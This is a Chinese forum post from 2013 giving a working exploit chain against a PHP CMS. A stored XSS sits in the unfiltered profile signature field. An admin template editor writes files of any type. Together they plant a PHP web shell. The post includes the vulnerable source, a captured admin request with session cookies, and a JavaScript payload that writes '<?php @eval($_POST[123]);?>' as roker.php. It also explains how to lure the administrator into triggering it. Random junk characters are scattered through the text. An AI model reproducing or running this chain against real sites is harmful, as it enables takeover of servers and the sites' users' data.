|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题9 @* o; }, p2 @' q( d) ]
官网已经修补了,所以重新下了源码! y/ [7 y: f5 X- T2 C) g
因为 后台登入 还需要认证码 所以 注入就没看了。- Z% k2 T' S. L: Y+ Q3 J
存在 xss
5 r# x- U5 `/ w, w7 V( Z漏洞文件 user/member/skin_edit.php5 S D; M1 I0 }# j- p0 u
本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:% E# }! c0 F+ M8 W
0 _ D# p/ y i* L Q; l</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>
4 W- k8 b$ \; `: X- f" G e , S1 o0 `0 v7 C1 L" V# `$ [
</textarea></td></tr>
* \1 q) U U9 f; y2 p2 G5 j
) m- ~0 X" n7 S user/do.php
% T0 {/ `! G! B& E1 ^' l7 ?$ Z2 r; _; Z) ]/ _. ]6 O- ]/ g
) y2 ^: L$ T( N4 Z/ Tif($op=='zl'){ //资料
( R4 d3 L5 f( V3 q! z( A ( O/ B2 \8 K, N- x3 x' b4 l
if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
, j+ u- u1 Q$ v exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));
! u8 f R# Y3 _4 n& r+ g7 a , s3 G3 Z, k' a8 }
$sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."', S% b6 Y+ z# d
. K8 W* y4 C3 b5 U CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'6 Q* S$ j) M, ~. W
where CS_Name='".$cscms_name."'";% T$ H8 H4 D- L7 G. W
, W, K1 c2 Y: m) Q0 t# Q' }
if($db->query($sql)){& u% @+ k: I- V0 Q2 @8 A
: h7 O: w, }3 s; w9 K& i% f exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));
. c2 e7 B% {! J J: }
9 @) g% `! i/ y+ ] }else{. C# f1 Q/ H. [
5 {! F0 ]( A1 ~8 H6 N exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));
) h/ @& l3 J, E5 E: k , Q& t- y9 ]) W) W. k% `
}
3 Z e( o9 J( y% Q# i- {; ~! F! y7 e* |" V
* F4 {/ w# J4 Z# `没有 过滤导致xss产生。2 q' i3 Z! g, R( E% Z0 X
后台 看了下 很奇葩的是可以写任意格式文件。。- R& S& j& L# E. U3 X3 X' u
抓包。。5 T" J* b2 a: i% [8 U S
) @8 w8 a4 z) E+ J1 V
* p# B% R: h. f$ v本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1
# o( ?, K% C x- g+ m N
- V! N1 A! C8 U9 IAccept: text/html, application/xhtml+xml, */*' @1 @- H0 ^7 u+ _5 [! z. R+ j
$ x# y: {. D6 T1 ~ ~ I. e$ {Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php
+ P8 S0 F' f. c: ?7 ?
. y9 o- {. r) q. ~Accept-Language: zh-CN0 o, U' ]8 Z6 \6 O' I
j$ x& {- e8 t. P
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)* L( s5 H, E* W! \* r' U
+ T3 Q# X6 e- H
Content-Type: application/x-www-form-urlencoded, N; j# p& _, ` u9 P: U
6 X' J3 ]/ U' g( \+ n' k/ {" ]Accept-Encoding: gzip, deflate* f+ `6 I# [8 S! V" |
! V* l5 h/ [+ _# F; d' C2 f
Host: 127.0.0.19 J6 [& `( }' ^+ }+ d, F) R
6 r) u4 `( h/ }; }$ W. g! P% v
Content-Length: 38
+ Z) ~. v0 S$ n3 M
6 n- p: X5 h/ EDNT: 1
3 g0 o) w5 X% X# p/ ] 5 l9 f# Z6 s# C/ q% `6 |
Connection: Keep-Alive! L6 ]$ o: P1 v% j
( ~2 h0 y% B+ @1 Y" G( ^% E; D
Cache-Control: no-cache+ r# @2 r; M; C2 [3 n3 P! x% C
. k+ i" s- b3 @Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594+ I- d! ?+ H. d" i% V
) f6 P8 v# h+ {% V! Q5 ^1 N6 x/ H# a' g. h# D/ @( d
name=aaa.php&content=%3Cs%3E%3Ca%25%3E+ O% h1 \: T7 W$ Z! X$ E: |: f
1 e4 J' }0 s6 u2 R9 G; C8 V: \, D) r! M t' M7 u/ \
4 T, W' J$ N: p/ a0 i# I* l
于是 构造js如下。
2 H6 _& t. f% X+ d! l% e( v& X8 o9 m$ b+ k( e- e1 N1 d i
本帖隐藏的内容<script>
: x* S+ X9 q n$ E YthisTHost = top.location.hostname;
7 r) h" d; h2 t) j1 p
8 b& D% n6 N0 R ^9 othisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";3 a# R4 ^" Q0 l" j4 A# n! P
* f% {* G2 J! c+ P& M
function PostSubmit(url, data, msg) { : r9 @3 ]+ {, x
var postUrl = url;2 W$ W/ ]) }. t1 \
3 w( ?; w& w& n) v
var postData = data; 9 Z" w( N$ G8 l% k
var msgData = msg;
+ Q9 R1 M5 m9 S var ExportForm = document.createElement("FORM");
# A! K0 \$ N/ e s/ T! d+ i7 s document.body.appendChild(ExportForm); , n; K- W; h/ M2 [" I' N8 y
ExportForm.method = "POST"; ) A3 i; T4 h, \6 l
var newElement = document.createElement("input"); : {) o- q+ S/ j7 g8 S
newElement.setAttribute("name", "name");
$ ?6 R5 K. K& y! | newElement.setAttribute("type", "hidden");
1 e; Q3 y1 B/ Y% V var newElement2 = document.createElement("input"); ; [2 t5 [) p7 ]* u, {
newElement2.setAttribute("name", "content"); 3 Y/ C. s' r6 |* |2 t
newElement2.setAttribute("type", "hidden");
# R" Z/ |1 `: E) u5 t ExportForm.appendChild(newElement);
0 P0 w0 ?$ _2 Q7 d1 c6 T0 }5 X ExportForm.appendChild(newElement2);
+ P' ~( s, c4 f6 {" ~; |- ? newElement.value = postData;
; k) I: F* t. ^: N/ n+ x: q newElement2.value = msgData; / Q- h# K; C# {! B& T& m2 v
ExportForm.action = postUrl; ! \7 K! e# `% Z _2 r. J) v
ExportForm.submit(); k, F8 N: G5 m f* [
};
3 w0 D* p- l0 \. u1 [. g: e, b
" ^, K/ Q& i* }& b! S( B) LPostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");* R4 r6 a* o+ B
: G9 y" ^# B9 b# k( k2 r8 O</script>
& E& W% g! n& D R1 C1 ?- c+ Z' |# H9 \$ q: l& V7 A; L
8 p" y' m1 W' D6 ~
% f$ ^( S8 l; e$ X
http://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入
4 B+ X- q2 @0 |. |用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)* T' a( D# k$ T& a
就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
3 E9 i+ x l# ?# t6 X
|
|
发表于 2013-11-6 18:09:37
收藏
支持
反对